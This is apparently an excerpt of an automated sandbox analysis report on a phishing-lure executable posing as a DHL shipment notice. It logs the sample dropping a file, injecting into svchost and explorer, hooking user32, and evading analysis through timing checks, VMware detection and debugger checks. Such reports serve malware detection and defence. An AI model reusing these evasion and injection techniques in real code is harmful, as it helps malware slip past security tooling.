          Source: Binary string: wntdll.pdb source: aeokw.exe, 00000001.00000003.255155254.0000000002E70000.00000004.00001000.00020000.00000000.sdmp, aeokw.exe, 00000001.00000003.254132987.000000001ADE0000.00000004.00001000.00020000.00000000.sdmp, aeokw.exe, 00000002.00000003.260122291.00000000012DE000.00000004.00000800.00020000.00000000.sdmp, aeokw.exe, 00000002.00000002.322328355.0000000001470000.00000040.00000800.00020000.00000000.sdmp, aeokw.exe, 00000002.00000002.322514089.000000000158F000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000011.00000002.514140723.0000000003000000.00000040.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.322000917.0000000002C00000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000003.323291458.0000000002E00000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000011.00000002.514664363.000000000311F000.00000040.00000800.00020000.00000000.sdmp
          Source: Binary string: svchost.pdb source: aeokw.exe, 00000002.00000002.322286626.00000000011DA000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: aeokw.exe, 00000002.00000002.322286626.00000000011DA000.00000004.00000020.00020000.00000000.sdmp
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 1_2_00D72445 push ecx; ret 1_2_00D72458
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_00401026 push 5DA8CC51h; iretd 2_2_0040102E
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_0041E8F5 pushad ; ret 2_2_0041E8FA
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_0040E32E push ebx; ret 2_2_0040E32F
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_0041D475 push eax; ret 2_2_0041D4C8
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_0041D4C2 push eax; ret 2_2_0041D4C8
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_0041D4CB push eax; ret 2_2_0041D532
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_0041D52C push eax; ret 2_2_0041D532
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_00D72445 push ecx; ret 2_2_00D72458
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0307D0D1 push ecx; ret 17_2_0307D0E4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0238E32E push ebx; ret 17_2_0238E32F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0239E8F5 pushad ; ret 17_2_0239E8FA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0239D475 push eax; ret 17_2_0239D4C8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0239D4CB push eax; ret 17_2_0239D532
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0239D4C2 push eax; ret 17_2_0239D4C8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0239D52C push eax; ret 17_2_0239D532
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeFile created: C:\Users\user\AppData\Local\Temp\aeokw.exeJump to dropped file

          Hooking and other Techniques for Hiding and Protection

          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x8E 0xEE 0xE6
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 1_2_00D71890 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00D71890
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeRDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeRDTSC instruction interceptor: First address: 0000000000409B6E second address: 0000000000409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 0000000002389904 second address: 000000000238990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 0000000002389B6E second address: 0000000002389B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\explorer.exe TID: 6084Thread sleep time: -50000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exe TID: 2312Thread sleep time: -40000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\svchost.exeLast function: Thread delayed
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_1-6508
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 2_2_00409AA0 rdtsc 2_2_00409AA0
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeAPI coverage: 4.5 %
          Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 7.7 %
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeCode function: 0_2_00405D7A CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405D7A
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeCode function: 0_2_004069A4 FindFirstFileW,FindClose,0_2_004069A4
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeCode function: 0_2_0040290B FindFirstFileW,0_2_0040290B
          Source: C:\Users\user\Desktop\DHL SHIPMENT NOTIFICATION 1146789443.exeAPI call chain: ExitProcess graph end nodegraph_0-3509
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeAPI call chain: ExitProcess graph end nodegraph_1-6510
          Source: explorer.exe, 00000005.00000000.346368110.00000000051AC000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
          Source: explorer.exe, 00000005.00000000.305531432.000000000546A000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: =b\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.303730790.00000000051D2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: -94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}71USER
          Source: explorer.exe, 00000005.00000000.270277759.0000000006005000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00
          Source: explorer.exe, 00000005.00000000.290260130.0000000005EAB000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.270277759.0000000006005000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000005.00000000.303730790.00000000051D2000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
          Source: explorer.exe, 00000005.00000000.270277759.0000000006005000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday
          Source: explorer.exe, 00000005.00000000.268351234.000000000510C000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000005.00000000.270277759.0000000006005000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware SATA CD00dRom0cY
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 1_2_00D77A95 IsDebuggerPresent,1_2_00D77A95
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 1_2_00D7558A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,1_2_00D7558A
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeCode function: 1_2_00D786ED __lseeki64_nolock,__lseeki64_nolock,GetProcessHeap,HeapAlloc,__setmode_nolock,__write_nolock,__setmode_nolock,GetProcessHeap,HeapFree,__lseeki64_nolock,SetEndOfFile,GetLastError,__lseeki64_nolock,1_2_00D786ED
          Source: C:\Users\user\AppData\Local\Temp\aeokw.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A309 mov eax, dword ptr fs:[00000030h]17_2_0304A309
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E131B mov eax, dword ptr fs:[00000030h]17_2_030E131B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0302DB40 mov eax, dword ptr fs:[00000030h]17_2_0302DB40
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F8B58 mov eax, dword ptr fs:[00000030h]17_2_030F8B58
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0302F358 mov eax, dword ptr fs:[00000030h]17_2_0302F358
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0302DB60 mov ecx, dword ptr fs:[00000030h]17_2_0302DB60
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03053B7A mov eax, dword ptr fs:[00000030h]17_2_03053B7A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E138A mov eax, dword ptr fs:[00000030h]17_2_030E138A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03031B8F mov eax, dword ptr fs:[00000030h]17_2_03031B8F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030DD380 mov ecx, dword ptr fs:[00000030h]17_2_030DD380
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03052397 mov eax, dword ptr fs:[00000030h]17_2_03052397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305B390 mov eax, dword ptr fs:[00000030h]17_2_0305B390
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03054BAD mov eax, dword ptr fs:[00000030h]17_2_03054BAD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F5BA5 mov eax, dword ptr fs:[00000030h]17_2_030F5BA5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A53CA mov eax, dword ptr fs:[00000030h]17_2_030A53CA
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030503E2 mov eax, dword ptr fs:[00000030h]17_2_030503E2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304DBE9 mov eax, dword ptr fs:[00000030h]17_2_0304DBE9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03038A0A mov eax, dword ptr fs:[00000030h]17_2_03038A0A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03025210 mov eax, dword ptr fs:[00000030h]17_2_03025210
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03025210 mov ecx, dword ptr fs:[00000030h]17_2_03025210
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0302AA16 mov eax, dword ptr fs:[00000030h]17_2_0302AA16
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03043A1C mov eax, dword ptr fs:[00000030h]17_2_03043A1C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030EAA16 mov eax, dword ptr fs:[00000030h]17_2_030EAA16
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03064A2C mov eax, dword ptr fs:[00000030h]17_2_03064A2C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A229 mov eax, dword ptr fs:[00000030h]17_2_0304A229
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03029240 mov eax, dword ptr fs:[00000030h]17_2_03029240
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030EEA55 mov eax, dword ptr fs:[00000030h]17_2_030EEA55
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030B4257 mov eax, dword ptr fs:[00000030h]17_2_030B4257
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030DB260 mov eax, dword ptr fs:[00000030h]17_2_030DB260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F8A62 mov eax, dword ptr fs:[00000030h]17_2_030F8A62
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0306927A mov eax, dword ptr fs:[00000030h]17_2_0306927A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305D294 mov eax, dword ptr fs:[00000030h]17_2_0305D294
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030252A5 mov eax, dword ptr fs:[00000030h]17_2_030252A5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0303AAB0 mov eax, dword ptr fs:[00000030h]17_2_0303AAB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305FAB0 mov eax, dword ptr fs:[00000030h]17_2_0305FAB0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03052ACB mov eax, dword ptr fs:[00000030h]17_2_03052ACB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03052AE4 mov eax, dword ptr fs:[00000030h]17_2_03052AE4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03029100 mov eax, dword ptr fs:[00000030h]17_2_03029100
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03029100 mov eax, dword ptr fs:[00000030h]17_2_03029100
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03029100 mov eax, dword ptr fs:[00000030h]17_2_03029100
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03044120 mov eax, dword ptr fs:[00000030h]17_2_03044120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03044120 mov eax, dword ptr fs:[00000030h]17_2_03044120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03044120 mov eax, dword ptr fs:[00000030h]17_2_03044120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03044120 mov eax, dword ptr fs:[00000030h]17_2_03044120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03044120 mov ecx, dword ptr fs:[00000030h]17_2_03044120
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305513A mov eax, dword ptr fs:[00000030h]17_2_0305513A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305513A mov eax, dword ptr fs:[00000030h]17_2_0305513A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304B944 mov eax, dword ptr fs:[00000030h]17_2_0304B944
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304B944 mov eax, dword ptr fs:[00000030h]17_2_0304B944
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0302C962 mov eax, dword ptr fs:[00000030h]17_2_0302C962
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0302B171 mov eax, dword ptr fs:[00000030h]17_2_0302B171
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0302B171 mov eax, dword ptr fs:[00000030h]17_2_0302B171
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305A185 mov eax, dword ptr fs:[00000030h]17_2_0305A185
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304C182 mov eax, dword ptr fs:[00000030h]17_2_0304C182
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03052990 mov eax, dword ptr fs:[00000030h]17_2_03052990
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030561A0 mov eax, dword ptr fs:[00000030h]17_2_030561A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030561A0 mov eax, dword ptr fs:[00000030h]17_2_030561A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E49A4 mov eax, dword ptr fs:[00000030h]17_2_030E49A4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E49A4 mov eax, dword ptr fs:[00000030h]17_2_030E49A4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E49A4 mov eax, dword ptr fs:[00000030h]17_2_030E49A4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E49A4 mov eax, dword ptr fs:[00000030h]17_2_030E49A4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A69A6 mov eax, dword ptr fs:[00000030h]17_2_030A69A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A51BE mov eax, dword ptr fs:[00000030h]17_2_030A51BE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A51BE mov eax, dword ptr fs:[00000030h]17_2_030A51BE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A51BE mov eax, dword ptr fs:[00000030h]17_2_030A51BE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A51BE mov eax, dword ptr fs:[00000030h]17_2_030A51BE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030499BF mov ecx, dword ptr fs:[00000030h]17_2_030499BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030499BF mov ecx, dword ptr fs:[00000030h]17_2_030499BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030499BF mov eax, dword ptr fs:[00000030h]17_2_030499BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030499BF mov ecx, dword ptr fs:[00000030h]17_2_030499BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030499BF mov ecx, dword ptr fs:[00000030h]17_2_030499BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030499BF mov eax, dword ptr fs:[00000030h]17_2_030499BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030499BF mov ecx, dword ptr fs:[00000030h]17_2_030499BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030499BF mov ecx, dword ptr fs:[00000030h]17_2_030499BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030499BF mov eax, dword ptr fs:[00000030h]17_2_030499BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030499BF mov ecx, dword ptr fs:[00000030h]17_2_030499BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030499BF mov ecx, dword ptr fs:[00000030h]17_2_030499BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030499BF mov eax, dword ptr fs:[00000030h]17_2_030499BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030B41E8 mov eax, dword ptr fs:[00000030h]17_2_030B41E8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0302B1E1 mov eax, dword ptr fs:[00000030h]17_2_0302B1E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0302B1E1 mov eax, dword ptr fs:[00000030h]17_2_0302B1E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0302B1E1 mov eax, dword ptr fs:[00000030h]17_2_0302B1E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F4015 mov eax, dword ptr fs:[00000030h]17_2_030F4015
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F4015 mov eax, dword ptr fs:[00000030h]17_2_030F4015
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A7016 mov eax, dword ptr fs:[00000030h]17_2_030A7016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A7016 mov eax, dword ptr fs:[00000030h]17_2_030A7016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A7016 mov eax, dword ptr fs:[00000030h]17_2_030A7016
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305002D mov eax, dword ptr fs:[00000030h]17_2_0305002D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305002D mov eax, dword ptr fs:[00000030h]17_2_0305002D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305002D mov eax, dword ptr fs:[00000030h]17_2_0305002D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305002D mov eax, dword ptr fs:[00000030h]17_2_0305002D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305002D mov eax, dword ptr fs:[00000030h]17_2_0305002D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0303B02A mov eax, dword ptr fs:[00000030h]17_2_0303B02A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0303B02A mov eax, dword ptr fs:[00000030h]17_2_0303B02A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0303B02A mov eax, dword ptr fs:[00000030h]17_2_0303B02A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0303B02A mov eax, dword ptr fs:[00000030h]17_2_0303B02A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A830 mov eax, dword ptr fs:[00000030h]17_2_0304A830
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A830 mov eax, dword ptr fs:[00000030h]17_2_0304A830
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A830 mov eax, dword ptr fs:[00000030h]17_2_0304A830
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304A830 mov eax, dword ptr fs:[00000030h]17_2_0304A830
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03040050 mov eax, dword ptr fs:[00000030h]17_2_03040050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03040050 mov eax, dword ptr fs:[00000030h]17_2_03040050
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030F1074 mov eax, dword ptr fs:[00000030h]17_2_030F1074
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030E2073 mov eax, dword ptr fs:[00000030h]17_2_030E2073
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_03029080 mov eax, dword ptr fs:[00000030h]17_2_03029080
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A3884 mov eax, dword ptr fs:[00000030h]17_2_030A3884
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030A3884 mov eax, dword ptr fs:[00000030h]17_2_030A3884
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030520A0 mov eax, dword ptr fs:[00000030h]17_2_030520A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030520A0 mov eax, dword ptr fs:[00000030h]17_2_030520A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030520A0 mov eax, dword ptr fs:[00000030h]17_2_030520A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030520A0 mov eax, dword ptr fs:[00000030h]17_2_030520A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030520A0 mov eax, dword ptr fs:[00000030h]17_2_030520A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030520A0 mov eax, dword ptr fs:[00000030h]17_2_030520A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030690AF mov eax, dword ptr fs:[00000030h]17_2_030690AF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305F0BF mov ecx, dword ptr fs:[00000030h]17_2_0305F0BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305F0BF mov eax, dword ptr fs:[00000030h]17_2_0305F0BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0305F0BF mov eax, dword ptr fs:[00000030h]17_2_0305F0BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030BB8D0 mov eax, dword ptr fs:[00000030h]17_2_030BB8D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030BB8D0 mov ecx, dword ptr fs:[00000030h]17_2_030BB8D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030BB8D0 mov eax, dword ptr fs:[00000030h]17_2_030BB8D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030BB8D0 mov eax, dword ptr fs:[00000030h]17_2_030BB8D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030BB8D0 mov eax, dword ptr fs:[00000030h]17_2_030BB8D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030BB8D0 mov eax, dword ptr fs:[00000030h]17_2_030BB8D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304B8E4 mov eax, dword ptr fs:[00000030h]17_2_0304B8E4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_0304B8E4 mov eax, dword ptr fs:[00000030h]17_2_0304B8E4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030240E1 mov eax, dword ptr fs:[00000030h]17_2_030240E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030240E1 mov eax, dword ptr fs:[00000030h]17_2_030240E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030240E1 mov eax, dword ptr fs:[00000030h]17_2_030240E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 17_2_030258EC mov eax, dword ptr fs:[00000030h]17_2_030258EC
